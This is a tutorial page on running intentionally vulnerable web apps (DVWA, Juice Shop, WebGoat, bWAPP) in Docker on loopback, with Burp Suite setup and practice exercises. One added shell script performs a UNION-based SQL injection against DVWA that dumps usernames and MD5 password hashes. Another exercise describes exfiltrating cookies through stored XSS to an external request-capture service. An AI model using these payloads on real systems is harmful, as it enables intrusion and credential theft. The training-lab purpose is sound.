Web Application Lab Setup
Set up vulnerable web applications locally using Docker for practicing XSS, SQL injection, authentication bypass, and other web security vulnerabilities. Everything here is intentionally vulnerable: keep the containers bound to 127.0.0.1 (or inside an isolated VM) and never expose them on a shared network or the internet.
Docker Required
Quick Start with Docker
# Install Docker on Debian/Ubuntu
curl -fsSL https://get.docker.com -o get-docker.sh
sudo sh get-docker.sh
# Add your user to the docker group so you can run docker without sudo.
# Note: members of this group can start privileged containers and bind-mount /,
# so membership is equivalent to root on this host. Acceptable on a lab VM.
sudo usermod -aG docker $USER
newgrp docker
# Verify installation
docker --version
docker run hello-world
Vulnerable Applications
DVWA (Beginner) - Damn Vulnerable Web App, classic PHP vulnerabilities. Image: vulnerables/web-dvwa
OWASP Juice Shop (All Levels) - Modern JS/Node app with 100+ challenges. Image: bkimminich/juice-shop
WebGoat (Beginner) - OWASP learning platform for web security. Image: webgoat/webgoat
bWAPP (Intermediate) - Buggy Web Application with 100+ bugs. Image: raesene/bwapp
Mutillidae II (Beginner) - OWASP Top 10 vulnerable app. Image: citizenstig/nowasp
NodeGoat (Intermediate) - OWASP Node.js vulnerable application. Image: cider/owasp-nodegoat
DVWA Setup
DVWA (Damn Vulnerable Web Application) is perfect for beginners. It includes multiple security levels (Low, Medium, High, Impossible) for each vulnerability type.
# Pull and run DVWA (bound to loopback so it is not reachable from the LAN)
docker run -d -p 127.0.0.1:80:80 --name dvwa vulnerables/web-dvwa
# Access at http://localhost
# Default credentials: admin / password
# After login, click "Create / Reset Database" (the image keeps no volume,
# so repeat this whenever the container is recreated)
# Then go to DVWA Security and set level to "Low" to start
DVWA Vulnerabilities to Practice:
Brute Force, Command Injection, CSRF, File Inclusion, File Upload, Insecure CAPTCHA, SQL Injection, SQL Injection (Blind), Weak Session IDs, XSS (DOM), XSS (Reflected), XSS (Stored) and, in newer builds, CSP Bypass and JavaScript. Every module has Low, Medium, High and Impossible implementations; use the "View Source" button after each level to see exactly which filter you just bypassed and how the Impossible version fixes it.
OWASP Juice Shop Setup
Juice Shop is a modern, feature-rich vulnerable application with a gamified experience. It has 100+ challenges across all skill levels and covers the OWASP Top 10.
# Pull and run Juice Shop
docker run -d -p 127.0.0.1:3000:3000 --name juice-shop bkimminich/juice-shop
# Access at http://localhost:3000
# Features:
# - Built-in score board (find it as a challenge!)
# - 100+ challenges with hints
# - Covers OWASP Top 10 and more
# - Modern JavaScript/Node.js architecture
Juice Shop Tips
Finding the score board is the real first challenge: the UI never links to it. Once you have it, every challenge is listed with a difficulty rating (1 to 6 stars) and a hint, solved challenges light up, and a green notification confirms each solve as it happens. Work up the star ratings rather than jumping around.
OWASP WebGoat Setup
# Run WebGoat with WebWolf (the companion app that hosts files and receives mail for some lessons)
docker run -d -p 127.0.0.1:8080:8080 -p 127.0.0.1:9090:9090 --name webgoat webgoat/webgoat
# WebGoat: http://localhost:8080/WebGoat
# WebWolf: http://localhost:9090/WebWolf
# Register a new account to start (accounts are local to the container)
# Lessons are structured with explanations and exercises
Docker Compose: Multiple Apps
Run multiple vulnerable applications at once using Docker Compose. Host ports are bound to 127.0.0.1 on purpose: by default Docker publishes on every interface and inserts its own iptables rules ahead of host firewalls such as ufw, which would put these deliberately vulnerable apps on your LAN. The top-level version: key is obsolete in Compose v2 (it only produces a warning) and is omitted.
services:
  dvwa:
    image: vulnerables/web-dvwa
    ports:
      - "127.0.0.1:8081:80"
    container_name: dvwa
  juice-shop:
    image: bkimminich/juice-shop
    ports:
      - "127.0.0.1:3000:3000"
    container_name: juice-shop
  webgoat:
    image: webgoat/webgoat
    ports:
      - "127.0.0.1:8080:8080"
      - "127.0.0.1:9090:9090"
    container_name: webgoat
  bwapp:
    image: raesene/bwapp
    ports:
      - "127.0.0.1:8082:80"
    container_name: bwapp
# Run with: docker compose up -d   (docker-compose up -d with the legacy v1 binary)
# Stop with: docker compose down
# Create docker-compose.yml with the above content
# Then run:
docker compose up -d
# Check running containers
docker ps
# Access points:
# DVWA: http://localhost:8081 (click "Create / Reset Database" on first use)
# Juice Shop: http://localhost:3000
# WebGoat: http://localhost:8080/WebGoat
# bWAPP: http://localhost:8082 (visit /install.php once to create its database)
# Stop all
docker compose down
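A small bring-up script for this compose file, added here as an example; it is not part of Docker Compose or of any of the listed projects. It refuses to start if two services claim the same host port, or if one of them claims the port you gave Burp's proxy listener (WebGoat and Burp's default listener both want 8080), and then polls each app until it answers HTTP, because DVWA and WebGoat take noticeably longer to boot than Juice Shop. Assumptions: Compose v2 (docker compose), curl on the host, the compose file above saved as docker-compose.yml, and a BURP_PORT variable holding your Burp listener port (8888 if unset). Run it with LAB_UP=1 ./lab-up.sh; without LAB_UP it only defines the functions so they can be sourced.

```shell
#!/usr/bin/env bash
# lab-up.sh: sanity-check docker-compose.yml, start the lab, wait for each app.
# Added example for this page; not part of Docker, Burp or any listed project.
# Assumes Compose v2 ("docker compose"), curl on the host, the compose file
# from this page, and BURP_PORT set to the port Burp's listener uses.

COMPOSE_FILE="${COMPOSE_FILE:-docker-compose.yml}"
BURP_PORT="${BURP_PORT:-8888}"

# Print the host port of every short-form "[bind:]HOST:CONTAINER" mapping under
# ports:, one per line. Long-form mappings and port ranges are ignored.
compose_host_ports() {
  sed -n 's/^[[:space:]]*-[[:space:]]*"\{0,1\}\([0-9.]*:\)\{0,1\}\([0-9]\{1,5\}\):[0-9]\{1,5\}"\{0,1\}.*/\2/p' "$1"
}

# Host ports claimed more than once across the compose file plus the Burp
# listener port given as $2. Empty output means no conflict.
find_port_conflicts() {
  { compose_host_ports "$1"; echo "$2"; } | sort | uniq -d
}

# Poll a URL until it answers with any HTTP status (a 4xx from a login page
# still proves the app is up) or $2 seconds pass. Returns 1 on timeout.
wait_for_http() {
  url=$1
  deadline=$(( $(date +%s) + ${2:-120} ))
  while [ "$(date +%s)" -lt "$deadline" ]; do
    code=$(curl -s -o /dev/null -w '%{http_code}' --max-time 5 "$url" 2>/dev/null || true)
    case $code in
      2*|3*|4*|5*) printf 'ready   %s (HTTP %s)\n' "$url" "$code"; return 0 ;;
    esac
    sleep 3
  done
  printf 'TIMEOUT %s\n' "$url"
  return 1
}

main() {
  conflicts=$(find_port_conflicts "$COMPOSE_FILE" "$BURP_PORT")
  if [ -n "$conflicts" ]; then
    printf 'host port(s) claimed twice (compose file + Burp on %s): %s\n' \
      "$BURP_PORT" "$(printf '%s ' $conflicts)" >&2
    return 1
  fi
  docker compose -f "$COMPOSE_FILE" up -d
  wait_for_http http://127.0.0.1:8081/login.php 180
  wait_for_http http://127.0.0.1:3000/ 180
  wait_for_http http://127.0.0.1:8080/WebGoat/ 180
  wait_for_http http://127.0.0.1:8082/ 180
}

# Only touch containers when explicitly asked, so the file can also be sourced.
if [ "${LAB_UP:-0}" = 1 ]; then
  main
fi
```

The port parser deliberately accepts the 127.0.0.1: prefix so it works on the compose file above as well as on the unbound form; if you later add a service with a long-form ports: entry, extend compose_host_ports rather than trusting a silent pass.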
Burp Suite Configuration
Configure Burp Suite to intercept traffic to your local vulnerable apps. Burp's default listener port is 8080, which WebGoat already occupies in the setup above, so put the listener on a free port; 8888 is used here.
# 1. Start Burp Suite
# 2. Proxy > Options (Proxy settings in recent versions) > Add listener on 127.0.0.1:8888
# Browser Configuration (Firefox recommended, ideally in a dedicated profile):
# Settings > Network Settings > Manual proxy configuration
# HTTP Proxy: 127.0.0.1 Port: 8888
# Check "Also use this proxy for HTTPS"
# Firefox 67 and later bypass the proxy for localhost and 127.0.0.1 by default;
# set network.proxy.allow_hijacking_localhost to true in about:config or Burp
# will never see the lab traffic.
# Install Burp CA Certificate (the lab apps speak plain HTTP, so this only
# matters for HTTPS targets, but it is worth doing once):
# 1. With the proxy active, browse to http://burpsuite (or http://burp)
# 2. Click "CA Certificate" to download cacert.der
# 3. Import it under Settings > Privacy & Security > View Certificates >
#    Authorities, ticking "Trust this CA to identify websites"
# Target scope (add your apps so Burp's tools ignore everything else):
# Target > Scope > Add:
# - http://localhost:3000 (Juice Shop)
# - http://localhost:8081 (DVWA)
# - http://localhost:8080 (WebGoat)
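The same browser setup as a script, added as an example that is neither Burp's nor Mozilla's tooling. It writes a user.js for a dedicated Firefox profile (user.js is read on startup and overrides prefs.js, which is where the localhost-bypass pref has to go), then fetches Burp's CA through the proxy and adds it to the profile's NSS store so the profile trusts Burp's TLS interception from the first launch. Assumptions: Burp already listening on 127.0.0.1:$BURP_PORT (8888 if unset), certutil from libnss3-tools on the host, and the profile directory path, which is an arbitrary choice. Run it with BURP_SETUP=1 ./burp-firefox.sh.

```shell
#!/usr/bin/env bash
# burp-firefox.sh: build a throwaway Firefox profile that proxies through Burp.
# Added example for this page, not Burp's or Mozilla's own tooling. Assumes Burp
# listens on 127.0.0.1:$BURP_PORT and certutil (libnss3-tools) is installed.

BURP_PORT="${BURP_PORT:-8888}"
PROFILE_DIR="${PROFILE_DIR:-$HOME/.mozilla/firefox/burp-lab}"   # arbitrary choice

# Write the proxy prefs. The last one is the gotcha: since Firefox 67, requests
# to localhost / 127.0.0.1 skip any configured proxy unless
# network.proxy.allow_hijacking_localhost is true, so a lab on localhost would
# never show up in Burp. no_proxies_on is cleared for the same reason.
write_burp_proxy_prefs() {
  dir=$1
  port=$2
  mkdir -p "$dir"
  cat > "$dir/user.js" <<EOF
user_pref("network.proxy.type", 1);
user_pref("network.proxy.http", "127.0.0.1");
user_pref("network.proxy.http_port", $port);
user_pref("network.proxy.ssl", "127.0.0.1");
user_pref("network.proxy.ssl_port", $port);
user_pref("network.proxy.no_proxies_on", "");
user_pref("network.proxy.allow_hijacking_localhost", true);
EOF
}

# Read the HTTP proxy port back out of a profile's user.js (sanity check).
prefs_proxy_port() {
  sed -n 's/^user_pref("network.proxy.http_port", \([0-9]*\));$/\1/p' "$1/user.js"
}

# Fetch Burp's CA through the proxy (Burp serves it in DER form at
# http://burp/cert) and add it to the profile's NSS database as a CA trusted
# for websites ("C,,"). The database is created first if the profile is new.
install_burp_ca() {
  dir=$1
  port=$2
  curl -s -x "127.0.0.1:$port" -o "$dir/burp-ca.der" http://burp/cert
  [ -f "$dir/cert9.db" ] || certutil -N -d "sql:$dir" --empty-password
  certutil -A -n "PortSwigger CA" -t "C,," -i "$dir/burp-ca.der" -d "sql:$dir"
}

if [ "${BURP_SETUP:-0}" = 1 ]; then
  write_burp_proxy_prefs "$PROFILE_DIR" "$BURP_PORT"
  install_burp_ca "$PROFILE_DIR" "$BURP_PORT"
  # -no-remote keeps this instance separate from an already running Firefox.
  firefox -no-remote -profile "$PROFILE_DIR" &
fi
```

Keep this profile for lab work only: it trusts a CA whose private key sits in Burp's config, and it sends everything through a proxy that you may not always have running.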
Practice Exercises
Exercise 1: SQL Injection (DVWA)
Set security to Low. Go to SQL Injection page. Extract all usernames and passwords from the database.
Exercise 2: XSS Cookie Stealing (DVWA)
Use Stored XSS to inject a payload that sends cookies to a server you control (use webhook.site or requestbin).
Exercise 3: Find the Admin (Juice Shop)
Find the admin's email address, then log in as admin using SQL injection on the login form.
Exercise 4: JWT Manipulation (WebGoat)
Complete the JWT lessons - learn to decode, tamper, and exploit weak JWT implementations.
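Exercise 1 driven from the shell, as an added example that is not DVWA's own code: it logs in, switches the level to Low through the security form, and sends the standard Low-level UNION payload with curl. The response parser is checked offline against a constructed copy of DVWA's output (not captured from a live instance) so you can confirm it before the container is even up. Assumptions: DVWA 1.9 or later (the login and security forms carry a CSRF field named user_token), the database already created via "Create / Reset Database", and DVWA_URL pointing at the container (default http://127.0.0.1:8081, matching the compose file above). Run it with DVWA_RUN=1 ./dvwa-sqli.sh; without DVWA_RUN it only runs the offline self-check.

```shell
#!/usr/bin/env bash
# dvwa-sqli.sh: Exercise 1 from the shell. Logs in to DVWA, forces the Low
# level, and dumps every user and password hash with a UNION-based injection.
# Added example for this page, not DVWA's own code. Assumes DVWA 1.9+ (CSRF
# field named user_token), a created database, and the app at $DVWA_URL.

DVWA_URL="${DVWA_URL:-http://127.0.0.1:8081}"

# Pull the hidden user_token out of a DVWA form page read from stdin.
extract_user_token() {
  sed -n "s/.*name='user_token'[[:space:]]*value='\([0-9a-f]*\)'.*/\1/p" | head -n 1
}

# Low level runs: SELECT first_name, last_name FROM users WHERE user_id = '$id'
# The payload closes the quote, UNIONs two columns from the same table, and
# comments out the trailing quote with '#'. --data-urlencode does the encoding
# (a bare '#' in the URL would be a fragment and never reach the server).
SQLI_PAYLOAD="1' UNION SELECT user, password FROM users#"

# DVWA prints each row as "<pre>ID: ...<br />First name: X<br />Surname: Y</pre>"
# with all rows on one line; turn that into "X:Y" lines. The first row is the
# genuine match for user_id 1 (admin:admin); the rest are user:md5 from the UNION.
parse_sqli_results() {
  grep -o 'First name: [^<]*<br />Surname: [^<]*' \
    | sed 's/^First name: //; s/<br \/>Surname: /:/'
}

# Log in with the default credentials, then set the level to Low through the
# security form (the level is a cookie that DVWA sets from that page).
dvwa_login_low() {
  jar=$1
  token=$(curl -s -c "$jar" "$DVWA_URL/login.php" | extract_user_token)
  curl -s -b "$jar" -c "$jar" -o /dev/null "$DVWA_URL/login.php" \
    -d username=admin -d password=password -d Login=Login -d "user_token=$token"
  token=$(curl -s -b "$jar" -c "$jar" "$DVWA_URL/security.php" | extract_user_token)
  curl -s -b "$jar" -c "$jar" -o /dev/null "$DVWA_URL/security.php" \
    -d security=low -d seclev_submit=Submit -d "user_token=$token"
}

# Send the payload as the id parameter of the SQLi page and parse the rows.
dvwa_dump_users() {
  jar=$1
  curl -s -b "$jar" -G "$DVWA_URL/vulnerabilities/sqli/" \
    --data-urlencode "id=$SQLI_PAYLOAD" --data-urlencode Submit=Submit \
    | parse_sqli_results
}

# Offline self-check on a constructed copy of DVWA's Low-level output (not
# captured from a real instance): proves the parser before touching a container.
offline_selfcheck() {
  sample="<pre>ID: $SQLI_PAYLOAD<br />First name: admin<br />Surname: admin</pre><pre>ID: $SQLI_PAYLOAD<br />First name: admin<br />Surname: 5f4dcc3b5aa765d61d8327deb882cf99</pre><pre>ID: $SQLI_PAYLOAD<br />First name: gordonb<br />Surname: e99a18c428cb38d5f260853678922e03</pre>"
  printf '%s\n' "$sample" | parse_sqli_results
}

if [ "${DVWA_RUN:-0}" = 1 ]; then
  jar=$(mktemp)
  dvwa_login_low "$jar"
  dvwa_dump_users "$jar"
  rm -f "$jar"
else
  offline_selfcheck
fi
```

Against a live DVWA the output has the same shape as the self-check: one admin:admin line that is the real row for user_id 1, followed by a user:hash line per account. The hashes are unsalted MD5, which is a separate finding worth noting in your write-up; at Medium and High the same payload fails, and the View Source button shows which filter stopped it.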
Cleanup Commands
# Stop specific containers
docker stop dvwa juice-shop webgoat
# Remove containers
docker rm dvwa juice-shop webgoat
# Remove all stopped containers
docker container prune
# Remove images to free space
docker rmi vulnerables/web-dvwa bkimminich/juice-shop webgoat/webgoat
# Nuclear option - remove everything
docker system prune -a
💡 Pro Tip
Start with DVWA on "Low" security to understand each vulnerability type. Then increase difficulty and try Juice Shop for a more realistic modern web app experience. Document your findings as you would in a real pentest report.